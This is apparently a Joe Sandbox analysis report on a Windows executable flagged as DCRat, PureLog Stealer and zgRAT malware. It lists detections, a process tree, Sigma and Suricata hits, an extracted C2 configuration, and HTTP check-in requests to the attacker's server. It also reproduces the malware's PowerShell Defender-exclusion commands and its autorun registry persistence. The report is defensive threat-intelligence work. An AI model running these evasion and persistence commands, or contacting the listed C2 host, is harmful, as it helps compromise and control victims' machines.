Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
4si9noTBNw.exe

Overview

General Information

Sample name:4si9noTBNw.exe
renamed because original name is a hash value
Original sample name:68ef473852d3aefd8e5e4f2e00b3dfaa.exe
Analysis ID:1571653
MD5:68ef473852d3aefd8e5e4f2e00b3dfaa
SHA1:3ba2594ec459d1c9152558ebdd9611427347a73e
SHA256:f28d2482802e94cd02376a7153b318ef4facc86cfc804ae117419c520520f8ec
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 4si9noTBNw.exe (PID: 7596 cmdline: "C:\Users\user\Desktop\4si9noTBNw.exe" MD5: 68EF473852D3AEFD8E5E4F2E00B3DFAA)
    • csc.exe (PID: 7744 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2gwm2xp5\2gwm2xp5.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 7752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 7848 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES39B.tmp" "c:\Windows\System32\CSC5AB1265740184DDC93ABA6EF26458DB.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • powershell.exe (PID: 7276 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7344 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\VTixufCejPQZEvXiB.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7336 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\VTixufCejPQZEvXiB.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7916 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 7372 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\AccountPictures\winlogon.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7384 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Defender\en-GB\conhost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5480 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\4si9noTBNw.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7696 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\csCDqY6YZN.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7688 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • PING.EXE (PID: 6600 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
      • conhost.exe (PID: 8420 cmdline: "C:\Program Files\Windows Defender\en-GB\conhost.exe" MD5: 68EF473852D3AEFD8E5E4F2E00B3DFAA)
  • VTixufCejPQZEvXiB.exe (PID: 7768 cmdline: "C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe" MD5: 68EF473852D3AEFD8E5E4F2E00B3DFAA)
  • VTixufCejPQZEvXiB.exe (PID: 7808 cmdline: "C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe" MD5: 68EF473852D3AEFD8E5E4F2E00B3DFAA)
  • winlogon.exe (PID: 8112 cmdline: C:\Users\Public\AccountPictures\winlogon.exe MD5: 68EF473852D3AEFD8E5E4F2E00B3DFAA)
  • winlogon.exe (PID: 8148 cmdline: C:\Users\Public\AccountPictures\winlogon.exe MD5: 68EF473852D3AEFD8E5E4F2E00B3DFAA)
  • 4si9noTBNw.exe (PID: 8136 cmdline: C:\Users\user\Desktop\4si9noTBNw.exe MD5: 68EF473852D3AEFD8E5E4F2E00B3DFAA)
  • 4si9noTBNw.exe (PID: 7352 cmdline: C:\Users\user\Desktop\4si9noTBNw.exe MD5: 68EF473852D3AEFD8E5E4F2E00B3DFAA)
  • conhost.exe (PID: 7396 cmdline: "C:\Program Files\Windows Defender\en-GB\conhost.exe" MD5: 68EF473852D3AEFD8E5E4F2E00B3DFAA)
  • conhost.exe (PID: 6676 cmdline: "C:\Program Files\Windows Defender\en-GB\conhost.exe" MD5: 68EF473852D3AEFD8E5E4F2E00B3DFAA)
  • VTixufCejPQZEvXiB.exe (PID: 8360 cmdline: "C:\Recovery\VTixufCejPQZEvXiB.exe" MD5: 68EF473852D3AEFD8E5E4F2E00B3DFAA)
  • conhost.exe (PID: 8496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • winlogon.exe (PID: 8616 cmdline: "C:\Users\Public\AccountPictures\winlogon.exe" MD5: 68EF473852D3AEFD8E5E4F2E00B3DFAA)
  • conhost.exe (PID: 8752 cmdline: "C:\Program Files\Windows Defender\en-GB\conhost.exe" MD5: 68EF473852D3AEFD8E5E4F2E00B3DFAA)
  • 4si9noTBNw.exe (PID: 8932 cmdline: "C:\Users\user\Desktop\4si9noTBNw.exe" MD5: 68EF473852D3AEFD8E5E4F2E00B3DFAA)
  • svchost.exe (PID: 9108 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://306039cm.nyashcrack.top/geoGeneratorwordpresswpprivatetempDownloads", "MUTEX": "DCR_MUTEX-6D1Q3I5bf77yvwQ4WtMP", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
4si9noTBNw.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    4si9noTBNw.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                Click to see the 5 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000000.00000002.1813554604.000000001360B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                  00000000.00000000.1668520663.0000000000F62000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    Process Memory Space: 4si9noTBNw.exe PID: 7596JoeSecurity_DCRat_1Yara detected DCRatJoe Security
                      Process Memory Space: conhost.exe PID: 8420JoeSecurity_DCRat_1Yara detected DCRatJoe Security

                        Unpacked PEs

                        SourceRuleDescriptionAuthorStrings
                        0.0.4si9noTBNw.exe.f60000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                          0.0.4si9noTBNw.exe.f60000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                            Sigma Signatures

                            System Summary

                            barindex
                            Sigma detected: Execution from Suspicious Folder
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\AccountPictures\winlogon.exe, CommandLine: C:\Users\Public\AccountPictures\winlogon.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\AccountPictures\winlogon.exe, NewProcessName: C:\Users\Public\AccountPictures\winlogon.exe, OriginalFileName: C:\Users\Public\AccountPictures\winlogon.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\Public\AccountPictures\winlogon.exe, ProcessId: 8112, ProcessName: winlogon.exe
                            Sigma detected: Files With System Process Name In Unsuspected Locations
                            Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\4si9noTBNw.exe, ProcessId: 7596, TargetFilename: C:\Program Files\Windows Defender\en-GB\conhost.exe
                            Sigma detected: New RUN Key Pointing to Suspicious Folder
                            Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: "C:\Users\Public\AccountPictures\winlogon.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\4si9noTBNw.exe, ProcessId: 7596, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon
                            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\4si9noTBNw.exe", ParentImage: C:\Users\user\Desktop\4si9noTBNw.exe, ParentProcessId: 7596, ParentProcessName: 4si9noTBNw.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe', ProcessId: 7276, ProcessName: powershell.exe
                            Sigma detected: System File Execution Location Anomaly
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Users\Public\AccountPictures\winlogon.exe, CommandLine: C:\Users\Public\AccountPictures\winlogon.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\AccountPictures\winlogon.exe, NewProcessName: C:\Users\Public\AccountPictures\winlogon.exe, OriginalFileName: C:\Users\Public\AccountPictures\winlogon.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\Public\AccountPictures\winlogon.exe, ProcessId: 8112, ProcessName: winlogon.exe
                            Sigma detected: CurrentVersion Autorun Keys Modification
                            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\4si9noTBNw.exe, ProcessId: 7596, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VTixufCejPQZEvXiB
                            Sigma detected: CurrentVersion NT Autorun Keys Modification
                            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\4si9noTBNw.exe, ProcessId: 7596, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                            Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2gwm2xp5\2gwm2xp5.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2gwm2xp5\2gwm2xp5.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\4si9noTBNw.exe", ParentImage: C:\Users\user\Desktop\4si9noTBNw.exe, ParentProcessId: 7596, ParentProcessName: 4si9noTBNw.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2gwm2xp5\2gwm2xp5.cmdline", ProcessId: 7744, ProcessName: csc.exe
                            Sigma detected: Powershell Defender Exclusion
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\4si9noTBNw.exe", ParentImage: C:\Users\user\Desktop\4si9noTBNw.exe, ParentProcessId: 7596, ParentProcessName: 4si9noTBNw.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe', ProcessId: 7276, ProcessName: powershell.exe
                            Sigma detected: Dynamic CSharp Compile Artefact
                            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\4si9noTBNw.exe, ProcessId: 7596, TargetFilename: C:\Users\user\AppData\Local\Temp\2gwm2xp5\2gwm2xp5.cmdline
                            Sigma detected: Non Interactive PowerShell Process Spawned
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\4si9noTBNw.exe", ParentImage: C:\Users\user\Desktop\4si9noTBNw.exe, ParentProcessId: 7596, ParentProcessName: 4si9noTBNw.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe', ProcessId: 7276, ProcessName: powershell.exe
                            Sigma detected: Windows Processes Suspicious Parent Directory
                            Source: Process startedAuthor: vburov: Data: Command: C:\Users\Public\AccountPictures\winlogon.exe, CommandLine: C:\Users\Public\AccountPictures\winlogon.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\AccountPictures\winlogon.exe, NewProcessName: C:\Users\Public\AccountPictures\winlogon.exe, OriginalFileName: C:\Users\Public\AccountPictures\winlogon.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\Public\AccountPictures\winlogon.exe, ProcessId: 8112, ProcessName: winlogon.exe

                            Data Obfuscation

                            barindex
                            Sigma detected: Dot net compiler compiles file from suspicious location
                            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2gwm2xp5\2gwm2xp5.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2gwm2xp5\2gwm2xp5.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\4si9noTBNw.exe", ParentImage: C:\Users\user\Desktop\4si9noTBNw.exe, ParentProcessId: 7596, ParentProcessName: 4si9noTBNw.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2gwm2xp5\2gwm2xp5.cmdline", ProcessId: 7744, ProcessName: csc.exe

                            Suricata Signatures

                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-09T16:00:32.875792+010020480951A Network Trojan was detected192.168.2.44973637.44.238.25080TCP

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus / Scanner detection for submitted sample
                            Source: 4si9noTBNw.exeAvira: detected
                            Antivirus detection for URL or domain
                            Source: http://306039cm.nyashcrack.top/geoGeneratorwordpresswpprivatetempDownloads.phpAvira URL Cloud: Label: malware
                            Antivirus detection for dropped file
                            Source: C:\Users\user\Desktop\JzShoUtR.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                            Source: C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                            Source: C:\Users\Public\AccountPictures\winlogon.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                            Source: C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                            Source: C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                            Source: C:\Users\user\AppData\Local\Temp\csCDqY6YZN.batAvira: detection malicious, Label: BAT/Delbat.C
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                            Found malware configuration
                            Source: 00000000.00000002.1813554604.000000001360B000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://306039cm.nyashcrack.top/geoGeneratorwordpresswpprivatetempDownloads", "MUTEX": "DCR_MUTEX-6D1Q3I5bf77yvwQ4WtMP", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                            Multi AV Scanner detection for dropped file
                            Source: C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exeReversingLabs: Detection: 68%
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeReversingLabs: Detection: 68%
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeReversingLabs: Detection: 68%
                            Source: C:\Recovery\VTixufCejPQZEvXiB.exeReversingLabs: Detection: 68%
                            Source: C:\Users\Public\AccountPictures\winlogon.exeReversingLabs: Detection: 68%
                            Source: C:\Users\user\Desktop\JzShoUtR.logReversingLabs: Detection: 50%
                            Source: C:\Users\user\Desktop\YdQxpHbm.logReversingLabs: Detection: 50%
                            Source: C:\Users\user\Desktop\exZDPEZZ.logReversingLabs: Detection: 70%
                            Source: C:\Users\user\Desktop\hMjNZkhU.logReversingLabs: Detection: 70%
                            Source: C:\Users\user\Desktop\nocldQFM.logReversingLabs: Detection: 25%
                            Source: C:\Users\user\Desktop\xWYkXXxo.logReversingLabs: Detection: 25%
                            Multi AV Scanner detection for submitted file
                            Source: 4si9noTBNw.exeReversingLabs: Detection: 68%
                            AI detected suspicious sample
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                            Machine Learning detection for dropped file
                            Source: C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exeJoe Sandbox ML: detected
                            Source: C:\Users\Public\AccountPictures\winlogon.exeJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exeJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\Desktop\OuwhFfWF.logJoe Sandbox ML: detected
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeJoe Sandbox ML: detected
                            Machine Learning detection for sample
                            Source: 4si9noTBNw.exeJoe Sandbox ML: detected
                            Source: 4si9noTBNw.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeDirectory created: C:\Program Files\Windows Defender\en-GB\conhost.exeJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeDirectory created: C:\Program Files\Windows Defender\en-GB\088424020bedd6Jump to behavior
                            Source: 4si9noTBNw.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\2gwm2xp5\2gwm2xp5.pdb source: 4si9noTBNw.exe, 00000000.00000002.1763786734.0000000003C4D000.00000004.00000800.00020000.00000000.sdmp

                            Spreading

                            barindex
                            Infects executable files (exe, dll, sys, html)
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

                            Networking

                            barindex
                            Suricata IDS alerts for network traffic
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49736 -> 37.44.238.250:80
                            Uses ping.exe to check the status of other devices and networks
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: Joe Sandbox ViewIP Address: 37.44.238.250 37.44.238.250
                            Source: Joe Sandbox ViewASN Name: HARMONYHOSTING-ASFR HARMONYHOSTING-ASFR
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 384Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1040Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1748Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 306039cm.nyashcrack.topContent-Length: 1040Expect: 100-continue
